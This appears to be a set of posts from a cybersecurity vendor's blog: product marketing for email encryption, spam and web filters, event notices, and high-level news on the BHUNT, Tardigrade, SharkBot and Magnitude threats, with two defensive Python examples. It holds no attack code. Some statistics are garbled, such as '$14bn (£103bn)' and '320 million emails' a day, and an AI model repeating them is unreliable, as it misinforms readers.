This year, TitanHQ will be exhibiting at the event and will be on hand to explain how TitanHQ’s cybersecurity solutions can be used to improve cybersecurity defenses. TitanHQ has been providing cloud-based cybersecurity solutions to MSPs and SMBs for more than 20 years, and today more than 12,000 businesses – including more than 2,500 MSPs – rely on TitanHQ’s cybersecurity solutions to protect against cyber threats: SpamTitan Email Security, WebTitan Web Security, EncryptTitan Email Encryption, and ArcTitan Email Archiving.
If you have not yet booked your place at the event, you can register here. Be sure to come and visit the team to discover how TitanHQ solutions can help you grow your business and improve cybersecurity for you and your clients.
Sensitive information is often exposed in email incidents. To avoid reputation damage and financial loss, your business should be encrypting emails.
The Case for Encrypting Emails
Email is extensively used in business and a great deal of sensitive information is sent via email. If that information is exposed it can be a source of embarrassment, but far worse, data exposures can result in significant financial losses and can seriously damage trust and reputation. Emails need to be protected to ensure information contained therein remains confidential and to ensure the integrity of the messages. To do that, businesses need to use encryption technology.
Email transmission is not secure. An email can have four stopovers on its way from the sender to the recipient, and the email can be intercepted at any one point in that journey. Since unencrypted emails are transmitted in plaintext, if they are intercepted, they can be viewed and potentially altered.
According to Radicati research, 320 million emails were sent each day in 2021, and the figure is predicted to rise to 347 million a day next year. Given the high number of transmitted emails, it is perhaps no surprise that the UK’s Information Commissioner’s Office has reported that email data is the biggest contributor to security incidents.
Those security incidents are a combination of the interception of emails, the hijacking of email accounts, and accidental email exposures, where employees sent emails to the incorrect person. A study by Tessian indicates 58% of employees have sent an email to the wrong person. Email cyberattacks involve phishing to gain access to credentials, the use of credentials obtained in previous data breaches, and the hijacking of the DNS MX record, which is used to direct emails to a domain’s mail server.
Phishing attacks and email account compromises can be tackled with an advanced spam filter such as SpamTitan, strong password policies, and multifactor authentication. Email encryption can prevent email hijacking, email interception, email tampering, and email exposure through misdirection.
How Does Encrypting Emails Work?
Encrypting emails ensures that the content of the messages, which includes the message body and any attachments, is rendered unintelligible from the moment they are sent until they are opened and read by the intended recipient. Email encryption typically works using two layers of encryption, as is the case with EncryptTitan – TitanHQ’s email encryption solution.
An encryption protocol called Transport Layer Security (TLS) is used to prevent interception in transit, such as a man-in-the-middle attack. TLS email encryption is easy to use and does not require any additional steps if TLS-Verify is used. While TLS will protect emails in transit, a second layer of security is needed to ensure end-to-end encryption of the messages. When the message arrives at its intended destination there is the highest risk of being accessed by an unauthorized individual. Therefore, it is important for the recipient to authenticate to decrypt the email, to ensure that only the intended recipient can open the message.
EncryptTitan from TitanHQ
Solutions for encrypting emails need to be robust to ensure message confidentiality, but also easy to use. Solutions such as EncryptTitan have multi-layered security to ensure emails are protected in transit and can only be decrypted by the intended recipient, without making the sending of messages cumbersome, which would have a negative effect on productivity.
EncryptTitan includes Outlook plugins to make encrypting emails as easy as possible. The security settings dictate the amount of additional verification that is required, with the highest setting requiring the use of a one-time unique verification code that is delivered through the encryption portal. Not all emails need to be encrypted. When you send an email, if the recipient is not within the company domain, the sender receives a one-click prompt asking whether they want to encrypt the message.
When encrypting emails, EncryptTitan ensures attachments are also encrypted by default and the Data Loss Protection (DLP) feature scans for certain keywords and will automatically encrypt emails if they contain sensitive data.
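The two rules just described (prompt the sender when a recipient is outside the company domain, and auto-encrypt when the DLP scan finds sensitive content, attachments included) are simple enough to show as a small outbound-gateway decision function. This is an added example written for this page, not EncryptTitan’s code: the company domain, the DLP keyword list, and the payment-card pattern with its Luhn check are constructed assumptions standing in for a vendor’s own dictionaries.

```python
import re
from dataclasses import dataclass, field

# Assumption: the organisation's own domain; mail that stays inside it is not encrypted.
COMPANY_DOMAIN = "example.com"

# Constructed DLP keyword dictionary (case-insensitive substring match).
DLP_KEYWORDS = ("confidential", "social security", "patient record", "account number")

# Candidate payment card numbers: 13-16 digits, optionally separated by spaces or dashes.
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,15}\d\b")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum; cuts false positives from arbitrary long digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


@dataclass
class Message:
    sender: str
    recipients: list
    subject: str
    body: str
    attachments: list = field(default_factory=list)  # attachment file names only


def is_external(address: str) -> bool:
    """True when the recipient's domain is not the company domain."""
    return address.rsplit("@", 1)[-1].lower() != COMPANY_DOMAIN


def dlp_findings(text: str) -> list:
    """Return the reasons the DLP scanner would flag this text, if any."""
    findings = []
    lowered = text.lower()
    for kw in DLP_KEYWORDS:
        if kw in lowered:
            findings.append(f"keyword:{kw}")
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_ok(digits):
            findings.append("payment-card-number")
            break
    return findings


def encryption_decision(msg: Message) -> dict:
    """Decide how the gateway treats an outbound message.

    mode 'auto'   - DLP matched sensitive content: encrypt without asking
    mode 'prompt' - external recipient, no DLP hit: offer the one-click encrypt prompt
    mode 'none'   - every recipient is internal
    Attachments are encrypted along with the message whenever encryption happens.
    """
    external = [r for r in msg.recipients if is_external(r)]
    findings = dlp_findings(msg.subject + "\n" + msg.body)
    if findings:
        mode = "auto"
    elif external:
        mode = "prompt"
    else:
        mode = "none"
    return {
        "mode": mode,
        "external_recipients": external,
        "reasons": findings,
        "encrypt_attachments": mode != "none" and bool(msg.attachments),
    }
```

The DLP scan runs on subject and body together, because a card number in a subject line is just as much a leak as one in the body; a production scanner would also inspect attachment contents, which this example leaves out.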
EncryptTitan offers sender-defined email expiry dates, after which the email is deleted from the TitanHQ Secure Portal, and the option of recalling messages sent to the incorrect recipient. Setup is easy. There is no need to set up on-site hardware, as encryption takes place in the cloud, which makes the solution highly scalable. The solution is also agnostic of the email environment and will work across a wide range of email environments.
If you want to ensure that your company’s emails are protected against interception and tampering, contact TitanHQ for more information about EncryptTitan and to book a free product demonstration. The solution can also be offered as a service with ease by managed service providers who want to provide email encryption services to their clients.
Bitdefender has identified a new stealer malware called BHUNT that allows the attackers to access cryptocurrency wallets and irreversibly transfer funds to wallets under their control.
The continued rise in the value of cryptocurrencies has made cyberattacks on cryptocurrency wallets highly lucrative. Large organizations often use cryptocurrencies to improve business reach, reduce transaction costs, prevent chargeback fraud, and make cross-border transactions much easier. Businesses may hold large amounts of cryptocurrencies, so any attack that gives a hacker access to a business cryptocurrency wallet can result in a significant payday; however, attacks on individuals who hold far smaller amounts of cryptocurrencies are also being conducted. Anyone who holds cryptocurrencies is at risk of an attack.
Malware developers have created several malware variants that are primarily used to gain access to cryptocurrency wallets, including WeSteal malware, which was first identified in 2020 and is available on underground marketplaces. There are many other malware families that have cryptocurrency-stealing capabilities, such as the Redline Stealer, which is now one of the most common malware threats. According to an analysis by the blockchain data platform Chainalysis, cybercriminals stole $14bn (£103bn) in cryptocurrency in 2021 – a 79% increase from the previous year.
BHUNT is a new stealer that targets Exodus, Electrum, Atomic, Jaxx, Ethereum, Bitcoin, and Litecoin wallets, can steal passwords stored in Chrome and Firefox browsers, and captures passwords from the clipboard, although it is a specialized malware for stealing wallet files.
BHUNT is a stealthy cryptocurrency stealer that is heavily encrypted using two virtual machine packers – Themida and VMProtect – which hamper attempts by security researchers to reverse-engineer and analyze the malware. The malware is signed with a digital signature stolen from the CCleaner developer Piriform, although the certificate does not match the binaries, and the malware uses encrypted configuration scripts downloaded from public Pastebin pages. When installed, the malware is injected into explorer.exe.
Five modules have been identified: one steals wallet file contents, another downloads payloads, one steals passwords from the clipboard and exfiltrates them to the C2 server, another is a browser password stealer, and the last cleans up traces of the infection.
The malware has been used in attacks worldwide, especially in South Asia, the Philippines, and Greece, and appears to be distributed in a similar way to other successful information stealers such as the Redline Stealer, through cracks and product activators such as KMSpico.
To protect against infection with the BHUNT stealer, individuals should not download applications and programs from unofficial repositories and should avoid pirated software, software cracks, and other illegal product activators. Businesses should consider implementing defenses against cryptocurrency stealers such as antivirus software on all endpoints and technical solutions to prevent downloads of executable files.
Cryptocurrency stealers, banking trojans, malware downloaders, spyware, adware, and ransomware are often distributed in fake software and software cracks. While policies can be set that prohibit employees from downloading unauthorized software, those policies are often ignored by employees who download unauthorized software to allow them to work more efficiently.
One of the most effective ways of blocking the downloads of unauthorized and pirated software is to use a web filter. WebTitan can be configured to block access to hacking websites, peer-to-peer file-sharing networks, and other sites where cracks, pirated software, and illegal product activators are available.
WebTitan can also be configured to prevent the downloading of files commonly associated with malware, such as executable files, and controls can be implemented for individual users, user groups, departments, or organization wide.
January 21, 2022, will see the 2nd ever Channel Pitch Livestream Event – an opportunity for forward-thinking managed service providers, Internet service providers, value-added resellers, and IT service providers to discover new software solutions from some of the most exciting and innovative technology vendors that can help them grow their business.
The event serves as an introduction to a carefully curated selection of companies that have developed solutions that can help service providers improve protection against cyber threats, manage Microsoft 365 and Azure workloads more effectively, and streamline back-office processes to improve efficiency.
At this year’s event, hosted by Serial Tech Entrepreneur Kevin Lancaster and Channel Evangelist Matt Solomon, attendees will have the opportunity to hear from 7 companies about their MSP solutions, with each presentation lasting only 7 minutes. During those presentations, attendees will learn about the features and benefits of those solutions, and how they can be deployed in MSP environments to grow revenue and improve profitability. After the presentations, attendees will be able to engage directly with any of the vendors to discover more about the solutions, and feedback can be provided to each of the vendors with 100% anonymity.
TitanHQ is proud to be presenting at this Exclusive Livestream MSP event. Conor Madden, TitanHQ Director of Sales, will explain how TitanHQ’s award-winning email security and web security solutions can be used by MSPs, MSSPs, and ISPs to improve protections against the most common threats faced by MSPs and their clients, how the solutions are quick and easy to deploy, effortless to manage, and can help to improve profitability and win new business.
TitanHQ’s solutions have been adopted by more than 3,000 MSPs and are trusted by over 14,500 businesses worldwide to improve email and web security, with the feature-rich solutions offering multiple integrations via the advanced API set, granular policy controls, with a comprehensive suite of reports. The solutions identify more than 100,000 new malware sites every day through threat intelligence delivered from more than 650 million users worldwide.
The Livestream event is free of charge to register and attend and is a great opportunity for MSPs, MSSPs, ISPs, VARs, IT service providers, and consultants.
LiveStream Event Details
Date: January 21, 2022
Time: 4.00 p.m. GMT ¦ 11 a.m. EST ¦ 8 a.m. PST
Hosts: Kevin Lancaster and Matt Solomon
Over the past 4 years, TitanHQ has enjoyed an impressive period of growth, including during the pandemic when many businesses struggled. In addition to building its customer base, TitanHQ has continued to bring in new talent to help drive the business forward. Between September 2020 and April 2021, TitanHQ doubled the size of its workforce and this year released new products to further cement its place as the leading provider of cloud-based cybersecurity solutions to managed service providers serving the SMB market.
TitanHQ’s email security, web security, email archiving, and data encryption solutions are now used by more than 12,000 businesses worldwide, including Pepsi, O2, Virgin, T-Mobile, and Datto, to improve their security posture and meet compliance requirements. Among those businesses are over 2,500 managed services providers in 150 countries who use TitanHQ solutions to protect themselves and their customers from cyber threats.
This year, TitanHQ’s growth has been recognized in the 2021 Deloitte Technology Fast 50 Awards, with the company positioned number 33 in the list of Ireland’s fastest-growing technology companies. For the past 22 years, Deloitte has been running the annual awards program to celebrate innovation and entrepreneurship in Ireland’s indigenous technology sector. The list is compiled based on percentage revenue growth over the past 4 years.
In addition to enjoying significant organic year-on-year growth, TitanHQ has also received a significant investment from Livingbridge Investor Group, which has helped to accelerate the company’s ambitious growth plans through investment in people and product development. This month, TitanHQ launched a new spam filtering solution, SpamTitan Plus, which has faster and more comprehensive detection rates of malicious links in emails than any of the current market-leading email security solutions.
“As a result of increased demand globally for our solutions, we have invested heavily in product development and embarked on a recruitment campaign to double our workforce in a program that will allow that growth to continue,” said TitanHQ CEO, Ronan Kavanagh. “The quick move to remote working last year has made us all aware of how important it is to be adaptable and have the right security solutions in place to protect users, customers, company data, and systems.”
In addition to achieving a strong position in the 2021 Deloitte Technology Fast 50 list, TitanHQ was the runner-up in the Scale Up Award, which recognizes the companies that have enjoyed a significant expansion in overseas business over the past four years.
“Congratulations to all of the companies that ranked this year. This is the first year we have seen the impact the pandemic has had on revenues of Irish tech companies,” said David Shanahan, Partner, Deloitte. “It will come as no surprise that many of this year’s winners have achieved accelerated growth and scale as a result of the pandemic and being able to capitalize on the global move to a digital way of life.”
TitanHQ are proud to announce the launch of a new solution to protect businesses from increasingly sophisticated phishing threats. SpamTitan Plus builds on the huge success of SpamTitan Gateway and SpamTitan Cloud, which have been adopted by more than 12,000 business customers and over 3,000 Managed Service Providers worldwide.
SpamTitan solutions already provide advanced protection against phishing, malware, viruses, botnets, and ransomware that are delivered via email, with independent tests confirming a high detection and low false-positive rate. SpamTitan Plus takes those protections a step further, with significantly improved coverage, an uplift in phishing link detection, faster detection speeds, and an even lower false-positive rate.
Independent tests have confirmed SpamTitan Plus:
Provides 100% coverage of ALL current market-leading anti-phishing feeds.
Achieves a 1.5x increase in unique phishing URL detections
Has 1.6x faster phishing detections than current market-leading solutions
Is fed 10 million net new, previously undiscovered phishing URLs every single day
Just 5 minutes from initial detection of the malicious URL to protect end users’ mailboxes
Benefits of SpamTitan Plus
According to Deloitte, 91% of all cyberattacks start with a phishing email and despite many businesses providing phishing awareness training to the workforce, many employees still fail to identify phishing emails. Security Affairs says there is a 97% failure rate by employees. Add to that the increasingly sophisticated tactics used by phishers to evade email security solutions and trick end users and it is no surprise that phishing is the number 1 cybersecurity threat faced by businesses.
SpamTitan Plus improves defenses against phishing by blocking more threats before they reach inboxes and ensures that if a phishing email with a malicious link does make it to an inbox, protection is provided at the time an employee clicks the link.
SpamTitan Plus provides leading-edge protection through the use of an AI-based system and is fed the latest zero-day threat intelligence. Significant improvements have been made to protect against business email compromise attacks and effectively neutralize malicious links in emails. All links in emails are rewritten and inspected to determine if they are safe, and users benefit from time-of-click protection. That means when an individual clicks a link in an email, the content of the landing page is inspected for phishing forms and other malicious content such as spoofed webpages. Redirects are often used by phishers to fool email security solutions that only check the URL stated in the email. SpamTitan Plus protects against this by also following redirects.
Multiple dynamic checks are performed on URLs in real-time, with time-of-click protection ensuring that links included in emails that were benign at the time of delivery – and passed inspection – are detected as malicious if the URLs are weaponized at a later date. For instance, phishing emails may be sent on a Friday with benign links to pass inspection, and the URLs are then updated over the weekend with malicious content added ready for employees returning to work on Monday.
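The mechanism behind time-of-click protection is the link rewrite: each URL in the delivered message is replaced with a gateway link that carries the original destination and a signature, and the verdict is computed when the user clicks, not when the mail was delivered. The following is an added example written for this page, not SpamTitan’s implementation; the gateway hostname, the signing key, the reputation timeline, and the Friday/weekend/Monday timestamps are all constructed to replay the scenario described above, where a link is benign at delivery and weaponized over the weekend.

```python
import hashlib
import hmac
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumptions: a constructed click-gateway host and a demo signing key. A real
# deployment keeps the key in a secret store and uses its own gateway hostname.
GATEWAY = "https://click.gateway.invalid/scan"
SIGNING_KEY = b"constructed-demo-key-do-not-reuse"

URL_RE = re.compile(r"https?://[^\s<>\"']+")

# Constructed timeline: delivered on Friday, weaponized over the weekend, clicked Monday.
FRIDAY_DELIVERY = 1_700_000_000
WEEKEND_WEAPONISED = FRIDAY_DELIVERY + 2 * 86_400
MONDAY_CLICK = FRIDAY_DELIVERY + 3 * 86_400

# Constructed reputation feed: original URL -> [(time the verdict became known, verdict)].
REPUTATION = {
    "https://example.invalid/quarterly-report": [(WEEKEND_WEAPONISED, "malicious")],
}


def sign(url: str, sent_at: int) -> str:
    """HMAC over the original URL and send time, so the click handler can trust both."""
    msg = f"{sent_at}|{url}".encode()
    return hmac.new(SIGNING_KEY, msg, hashlib.sha256).hexdigest()


def rewrite_links(body: str, sent_at: int) -> str:
    """Replace every http(s) link with a gateway link carrying the original URL and signature."""
    def to_gateway(match):
        url = match.group(0)
        return GATEWAY + "?" + urlencode({"u": url, "t": sent_at, "sig": sign(url, sent_at)})
    return URL_RE.sub(to_gateway, body)


def verdict_at(url: str, now: int) -> str:
    """Latest verdict known at time `now`; unknown URLs are treated as clean in this demo."""
    verdict = "clean"
    for known_at, v in sorted(REPUTATION.get(url, [])):
        if known_at <= now:
            verdict = v
    return verdict


def handle_click(gateway_url: str, now: int) -> dict:
    """Time-of-click handler: verify the signature, then re-evaluate the destination now."""
    qs = parse_qs(urlsplit(gateway_url).query)
    try:
        url, sent_at, sig = qs["u"][0], int(qs["t"][0]), qs["sig"][0]
    except (KeyError, ValueError):
        return {"action": "reject", "reason": "malformed"}
    if not hmac.compare_digest(sig, sign(url, sent_at)):
        # Someone altered the destination (or the send time) after delivery.
        return {"action": "reject", "reason": "bad-signature"}
    verdict = verdict_at(url, now)
    return {"action": "block" if verdict == "malicious" else "allow", "verdict": verdict, "url": url}


def demo() -> dict:
    """Replay the Friday-delivery / Monday-click scenario and return each outcome."""
    body = "Please review https://example.invalid/quarterly-report before Monday."
    rewritten = rewrite_links(body, FRIDAY_DELIVERY)
    link = URL_RE.search(rewritten).group(0)
    tampered = link.replace("quarterly-report", "quarterly-report-2")
    return {
        "delivery_verdict": verdict_at("https://example.invalid/quarterly-report", FRIDAY_DELIVERY),
        "friday_click": handle_click(link, FRIDAY_DELIVERY)["action"],
        "monday_click": handle_click(link, MONDAY_CLICK)["action"],
        "tampered": handle_click(tampered, MONDAY_CLICK)["action"],
    }
```

The signature matters for a reason beyond integrity: a click gateway that blindly forwards whatever `u` parameter it receives becomes an open redirector, so the handler refuses any link it did not itself produce. Redirect following and landing-page inspection, which the text also describes, would sit inside `verdict_at` in a real system.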
SpamTitan Plus benefits from massive clickstream traffic from 600+ million users and endpoints, which generates 10 million never-before-seen phishing and malicious URLs a day. These unique daily URL additions are derived from several hundred billion local queries and 100 million cloud queries a day within SpamTitan Plus. The result is faster detection and better protection, with the lowest false positive rate of the market-leading phishing solution providers.
If you run a business or are a managed service provider (MSP) looking to improve phishing protection for your clients, give the TitanHQ team a call to find out more about SpamTitan Plus and how it can significantly improve your defenses against phishing and other email threats.
Biomedical firms and their partners are being targeted by an Advanced Persistent Threat (APT) actor in a campaign that delivers Tardigrade malware. Initial analyses of Tardigrade malware suggest it is a sophisticated threat from the SmokeLoader malware family. SmokeLoader is a generic backdoor that provides threat actors with persistent access to victims’ networks and gives them the ability to download additional modules or other stealthier malware variants onto systems.
Tardigrade malware is a much stealthier and more dangerous malware variant than SmokeLoader. It is far more sophisticated and has greater autonomy. The malware can make decisions about the files to modify and can move laterally within victims’ networks without requiring communication with a command-and-control server. The malware is also capable of immediate privilege escalation to the highest level.
Tardigrade malware is thought to be used for espionage purposes but has far greater capabilities. In addition to exfiltrating sensitive data from pharmaceutical and biomedical firms and vaccine chain companies, the malware is capable of causing major damage to IT systems to disrupt critical processes, including preparing systems for ransomware attacks after sensitive data have been exfiltrated. The analysis of the malware is ongoing, and no specific threat actor has been identified as conducting the attacks, but the attacks are believed to be conducted by a nation-state threat actor.
BIO-ISAC warns of Targeted Attacks on the Biomanufacturing Sector
The Bioeconomy Information Sharing and Analysis Center (BIO-ISAC) has recently issued a warning about Tardigrade malware due to the threat it poses to vaccine manufacturing infrastructure, even though relatively little is currently known about the malware. The early disclosure is believed to be in the public interest.
All firms in the biomanufacturing sector and their partners have been warned that they are likely targets and should assume that attacks will occur. Steps should therefore be taken to ensure that appropriate cybersecurity measures have been implemented to block attacks and limit the damage that can be caused should an attack be successful.
It is too early to tell how many methods are being used to distribute Tardigrade malware, but from the infections detected so far, the APT group behind the attacks is known to be using phishing emails to deliver Tardigrade, with infected file attachments the most likely method of delivery. Hyperlinks in emails that direct individuals to malicious websites where infected files or malware installers are downloaded could also be used.
An analysis of the attacks also indicates the malware could infect USB drives and transfer the malware automatically when those storage devices are used on uninfected computers. That means that if USB drives are used on devices isolated from the network, they too could be infected.
Defending Against Tardigrade Malware
Defending against attacks requires an advanced antispam solution that is not reliant on antivirus engines to detect malicious files. Antivirus engines are effective at blocking known malware variants, but not previously undetected variants. Since Tardigrade malware is metamorphic, machine learning technology and sandboxing are required to block samples that are not detected as malicious by AV engines. Antivirus software capable of behavioral analysis should be installed on all devices, as the malware itself may not be detected as malicious.
A web filter should be installed and should be configured to block downloads of executable files from the Internet, such as .js, .com, .exe, and .bat files. It is also important to raise awareness of the threat of malicious messages with the workforce and teach all employees how to identify phishing emails. Training should cover cybersecurity best practices and inform employees about the procedures to follow if a suspicious email is received. Spear phishing attacks will likely be conducted on key targets. It is therefore recommended to review LinkedIn and other social media posts to identify individuals who may be targeted.
Network segmentation is vital for preventing the spread of Tardigrade malware. In the event of a device being compromised, network segmentation will limit the harm that can be caused. Tests should be run to ensure that corporate, guest, and operational networks are properly segmented. All firms in the biomanufacturing sector should identify their most sensitive data and ensure that it is appropriately protected, and all key infrastructure should be regularly backed up, with backups stored offline. BIO-ISAC also recommends inquiring about lead times for key bio-infrastructure components that may need to be replaced.
A new Android banking Trojan named SharkBot has been identified that has capabilities that go beyond most mobile banking Trojans.
This new Android malware stands out due to its use of an Automatic Transfer System (ATS) technique that allows it to bypass multi-factor authentication controls and automate the process of stealing funds from victims’ accounts. In order to steal funds from accounts, most Trojans require human input. SharkBot keeps human interaction to a minimum by auto-filling fields, such as those that need to be completed to make money transfers.
SharkBot can intercept SMS messages, such as those containing multi-factor authentication codes sent by financial institutions, and can hide those SMS messages to make it appear that they have not been received. SharkBot can also perform overlay attacks, where a benign pop-up is displayed over an application to trick a user into performing tasks, such as giving permissions. SharkBot is also a keylogger and can record and exfiltrate sensitive information such as credentials to the attacker’s command and control server and bypasses the Android doze component to ensure it stays connected to its C2 servers.
The malware has been configured to steal money from bank accounts and cryptocurrency services in the United States, United Kingdom, and Italy, and targets 27 financial institutions – 22 banks and 5 cryptocurrency apps.
During installation, the user is bombarded with popups asking for the permissions the malicious app needs, and the popups only stop appearing once the user grants them, including enabling Accessibility Services. When the malicious app is installed, the app’s icon is not displayed on the home screen. The malware abuses Accessibility Services to prevent users from uninstalling it via settings.
The ATS technique used by the malware allows it to redirect payments. When a user attempts to make a bank transfer, information is auto-filled to direct payments to an attacker-controlled account, unbeknown to the victim.
The malware was analyzed by researchers at Cleafy, who found no similarities with any other malware variants. Since the malware has been written from scratch, it currently has a low detection rate. The researchers believe the malware is still in the early stages of development, and new capabilities could well be added to make it an even bigger threat.
One of the main problems for developers of malware targeting Android devices is how to get the malware installed on a device. Google performs checks of all apps available before adding them to the Google Play Store, so getting a malicious app on the Play Store is difficult. Even if that is achieved, Google is quick to identify and remove malicious apps.
SharkBot has been identified masquerading as a variety of apps such as an HD media player, data recovery app, and live TV streaming app. It is delivered via sideloading on rooted devices and through social engineering on compromised or attacker-owned websites that convince victims to download the fake app.
SharkBot uses a wide range of techniques to prevent detection and analysis, including obfuscation to hide malicious commands, an anti-emulator check to verify it has been installed on a real device, downloading malicious modules only after installation, and encrypting all communications between the malware and the C2 servers.
Users of mobile phones tend not to be as cautious as they are with laptops and computers, but the same cybersecurity best practices should be followed. It is important to avoid clicking hyperlinks in emails and to only download apps from official app stores. The malware also serves as a reminder that while multi-factor authentication is an effective security measure, it is not infallible.
2021 has been a particularly bad year for cyberattacks. There are still 6 weeks of 2021 left, but there have already been more publicly reported data breaches than in all of 2020, according to the Identity Theft Resource Center (ITRC). 2020 was a record-breaking year for cyberattacks, and that record looks set to be beaten once again.
ITRC said supply chain attacks increased by 42% in the first quarter of 2021, ransomware attacks have been occurring at record levels, and phishing attacks remain a constant threat. It is not just the number of data breaches being reported that is a cause for concern, but also the severity of those breaches.
This year has seen several high-profile attacks, including the ransomware attack on Colonial Pipeline in the United States that disrupted fuel supplies to the East Coast for a week, and a ransomware attack on the Irish Department of Health and the Health Service Executive in May 2021, which resulted in data theft and major disruption to healthcare services.
Attacks on critical infrastructure have a devastating impact on people, and businesses can suffer catastrophic losses. Given the current threat level and the frequency at which data breaches are being reported, it has never been more important to invest in cybersecurity.
Cybersecurity is now a priority for Irish businesses following a series of devastating cyberattacks in the country. Those attacks have hammered home the message that all Irish companies need to take steps to improve their defenses and keep hackers at bay.
Think Business, Ireland has recently raised awareness of the risk of cyberattacks and is helping businesses in the country find the solutions they need, by highlighting the excellent work being conducted by Irish cybersecurity firms. Many cybersecurity firms have a base in Ireland, with the country producing some incredible homegrown cybersecurity talent in the form of consultants, security experts, and companies that offer cutting-edge cybersecurity solutions that are protecting companies and data all around the world.
To help Irish businesses find companies that can meet their cybersecurity needs, Think Business, Ireland recently compiled a list of the top 26 Irish cybersecurity companies to watch out for in 2021 and beyond, with the report highlighting the wide range of cybersecurity solutions that have been developed by innovative Irish companies that are making their mark on the global stage.
The list includes TitanHQ, a Galway-based cybersecurity firm that has been developing innovative security solutions for 25 years. TitanHQ’s award-winning email security, web security, and email archiving solutions are now used by more than 12,000 businesses in over 150 countries, with more than 2,500 managed service providers using the solutions to protect their own and their clients’ networks from cyber threats such as malware, ransomware, viruses, botnets, and phishing.
While many businesses have been struggling through the pandemic, TitanHQ has gone from strength to strength and has continued to enjoy impressive growth. Investment from Livingbridge investor group has helped the company invest even more in product development and people and over the past 18 months, the company has doubled its workforce to more than 90 employees.
TitanHQ solutions have been developed to be easy to implement and use by all businesses and, importantly, the solutions were built from the ground up with managed service providers to help MSPs better protect their clients. The solutions save MSPs support and engineering time by stopping problems at the source and are easy to fit into existing service stacks. That’s part of the reason why TitanHQ is now the leading provider of cloud-based cybersecurity solutions to MSPs serving the SMB market.
“We are delighted to be listed next to some of the biggest names in the Irish cybersecurity space,” said Ronan Kavanagh, CEO, TitanHQ. “As the threat landscape continues to be a significant risk to organizations across the globe, we are dedicated to continuous innovation to provide consistent, secure, and reliable protection to our customers.”
Left to Right: Ronan Kavanagh, CEO, Diane Wright, people operations manager, Sean Morris, chief technical officer, Gina Mc Grath, digital marketing executive, and Dryden Geary, marketing director.
Exploit kits first emerged in 2006 and have since been used as an automated method of malware delivery. Exploit kits are programs that are loaded onto websites that contain exploits for known vulnerabilities. When a visitor lands on a web page that hosts an exploit kit, it performs a scan to determine if certain software vulnerabilities have not been patched. If an unpatched vulnerability is identified, the exploit kit will choose an exploit and will deliver a malware payload with no user interaction required.
Exploit kits became hugely popular with threat actors between 2010 and 2017, and while their use has declined to a fraction of the level seen in 2016 and 2017, they do still pose a threat. There are several exploit kits still being used that are regularly updated with new exploits for known vulnerabilities, and over the past couple of years they have mostly been used to deliver malware loaders that deliver ransomware.
The Fallout exploit kit for example has been used to deliver Maze Locker ransomware, and the Magnitude EK, which was first identified in 2013, is also being used to deliver ransomware, mostly in the Asia Pacific region.
Exploit kits are loaded on legitimate websites that have been compromised, as well as attacker-owned websites, with traffic to the latter often delivered through malicious adverts (malvertising). It is therefore easy to land on a site hosting an exploit kit through general web browsing.
The Magnitude EK is now one of the most extensively used exploit kits which, until recently, was only being used to target Internet Explorer; however, the exploit kit has now been updated and is being used to target Chromium-based web browsers on Windows PCs.
Avast reports that two new exploits have recently been added to the Magnitude EK, one of which targets a vulnerability in Google Chrome – CVE-2021-21224 – and the other targets the Windows kernel memory corruption vulnerability tracked as CVE-2021-31956. The Google Chrome bug is a remote code execution vulnerability, and the Windows bug can be exploited to bypass the Chrome sandbox, allowing an attacker to gain system privileges.
Patches have been released by Google and Microsoft to address both of these flaws; however, the reason why exploit kits are still an effective method of malware distribution is many people delay or ignore software updates. While the Magnitude EK is not believed to be currently exploiting the vulnerabilities to deliver a malware payload, it is unlikely that will remain the case for long.
The best defense against exploit kits is to ensure that software updates and patches are applied promptly, although that is not always possible for businesses and sometimes some devices are missed and remain vulnerable. An additional measure that can protect against exploit kits and other types of web-based malware distribution is a web filter.
Web filters are the Internet equivalent of spam filters. Just as a spam filter prevents the delivery of emails containing malware to inboxes, web filters prevent malware delivery via malicious websites and are a key component of anti-phishing defenses, preventing end-users from visiting websites hosting phishing kits.
TitanHQ has developed WebTitan to protect businesses from web-based threats and carefully control the content that can be accessed by office-based and remote workers. WebTitan is a DNS-based web filter that is quick and easy to implement, which has no impact on page load speeds. WebTitan is used by more than 12,000 businesses and managed service providers for content filtering, blocking malware delivery via the internet, and as an additional security measure to block phishing attacks.
If you want to improve protection against malware, malicious sites, phishing sites, C2 callbacks, ransomware, botnets, spyware, and viruses, give the TitanHQ team a call or put the solution to the test in your own environment by taking advantage of a 100% free 14-day trial of the full solution.
If you want to keep your computers and networks protected from malware, it is important to train your staff on how to identify a malicious website. You should also install a powerful web filtering solution to ensure your employees’ malicious website identification skills are never put to the test.
Cybercriminals are developing ingenious ways of compromising networks
Scammers and cybercriminals used to mainly send out emails with infected attachments. Double-clicking on the attachment would result in the computer, and possibly the network, being infected with malware. Oftentimes, this action would go undetected by anti-virus software programs. A full system scan would need to be conducted before the malicious software was identified.
Computer users are now much wiser and know never to open file attachments that have been sent to them by unknown individuals, and certainly never to double click on an executable file. Hackers and other cybercriminals have therefore needed to get smarter, and are now developing ever more sophisticated ways of obtaining user credentials and getting people to install malware manually. One of the ways they are doing this is by developing malicious websites.
End users are contacted via email and are sent links to websites along with a valid reason for visiting the site. Links to malicious websites are also frequently sent out in social media posts or are placed in third-party website adverts. Some sites are hijacked and visitors are redirected to fake sites automatically.
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo.
What is a malicious website?
Malicious websites host malware or are used to phish for sensitive information. In the case of the latter, users are tricked into revealing sensitive data such as login credentials for online banking websites.
Malware may require some user interaction before it is installed. Visitors may be tricked into downloading a security program, for instance, by being informed their computer is already infected with malware. They may be offered a free screensaver or asked to download a fake PDF invoice.
Increasingly, malicious websites are used to host exploit kits. Exploit kits probe visitors’ browsers to identify security vulnerabilities that can be exploited without any user interaction required. If a vulnerability is detected, malware can be installed automatically on the computer or network. This method of cyberattack is called a drive-by download. Drive-by downloads can involve malware being installed onto the computer’s hard drive, a network drive, or even loaded into the computer’s memory.
Learning how to identify a malicious website is important if you want to prevent your computer from being infected, and it is essential for system administrators and other IT professionals to conduct staff training to help end users avoid these dangerous sites.
How to identify a malicious website
There are some easy ways to tell if a website is attempting to install malware:
The website asks you to download software, save a file, or run a program
Visiting the website automatically launches a download window
